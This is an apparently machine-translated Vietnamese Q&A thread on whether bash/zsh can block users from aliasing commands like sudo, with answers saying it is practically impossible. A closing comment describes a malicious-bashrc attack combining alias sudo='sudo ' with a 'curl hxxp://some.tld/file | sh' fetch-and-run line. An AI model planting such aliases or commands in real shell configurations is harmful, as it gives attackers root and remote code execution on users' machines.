Câu hỏi Danh sách cấm bí danh bash / zsh cấp hệ thống


Có tính năng / chức năng danh sách đen trong bash / zsh để ngăn các lệnh được chỉ định và không bị ghi đè bằng bí danh không?

Cụ thể - có cái gì đó có thể được thiết lập cấp hệ thống trong một tập tin conf có lẽ có thể ngăn chặn tất cả các tài khoản từ răng cưa một lệnh được chỉ định.


0
2017-11-26 15:47


gốc




Các câu trả lời:


Tôi biết không có cách nào để ngăn chặn một người dùng từ việc đánh dấu một lệnh. Tôi nghĩ bạn có nghĩa là hàm bí danh của bash hoặc các loại vỏ khác.

Bạn có thể thử vá bash để bôi đen các lệnh nhất định khỏi bị đặt bí danh. Nhưng sau đó người dùng có thể viết chức năng vỏ thay vào đó, hoặc một kịch bản shell, hoặc một chương trình c, hoặc sử dụng một shell khác hoàn toàn.

Tôi nghĩ rằng nó là an toàn để nói rằng cố gắng để danh sách đen các lệnh nhất định từ được bí danh là thực tế không thể.


0
2017-11-27 11:50



Vâng, trong nghiên cứu của tôi cho đến nay điều này dường như là trường hợp. Quan điểm của tôi là ngăn chặn bí danh trên các lệnh nhất định (nói rằng, không có bí danh nào trên đầu trang của "sudo" hoặc "ls", bạn có gì) để chống tệ nạn khỏi bị tiêm vào một tệp bashrc - và bằng cách đặt nó ở mức hệ thống. Mục đích sẽ không bị hạn chế trong các chức năng của hệ thống, nhưng ngăn cản chúng có một bí danh vượt qua chúng với một ý định xấu nào đó. - damianb


Nếu mục đích của bạn là đảm bảo an toàn cho các lệnh như sudo, bạn nên suy nghĩ lại xem đó có phải là sử dụng hay không.

Nếu kẻ tấn công có thể thỏa hiệp cấu hình vỏ của bạn (thêm bí danh vui), thì tôi muốn nói rằng bạn đã bị hỏng.

[...]

Một số lựa chọn thay thế sẽ là:

  • một vỏ nguyên sơ /bin/zsh -f
  • hoặc sử dụng command sudo

nhưng một lần nữa nếu kẻ tấn công có cấu hình vỏ của bạn, điều đó có nghĩa là nó có thể thực thi mã tùy ý trong tài khoản của bạn ...


0
2017-12-11 10:32



"nếu kẻ tấn công có cấu hình vỏ của bạn, điều đó có nghĩa là nó có thể thực thi mã tùy ý trong tài khoản của bạn" - không hoàn toàn đúng. Nó có thể đơn giản như một cái gì đó tạo ra mặc định, chẳng hạn như trên kịch bản trực tuyến để "xây dựng một bashrc" (mà nên được nhìn chằm chằm nghi ngờ) cho một người dùng mới hơn ish. Gắn bó một quickie alias sudo='sudo ', sau đó một bí danh khác để làm cũ curl hxxp://some.tld/file | sh có nghĩa là nếu bí danh được sử dụng kết hợp với sudo, điều đó cung cấp cho kẻ tấn công nguồn gốc truy cập. Đó là một cách để sử dụng một lỗ hổng của userland để có được root, và đó là lý do tại sao tôi quan tâm. - damianb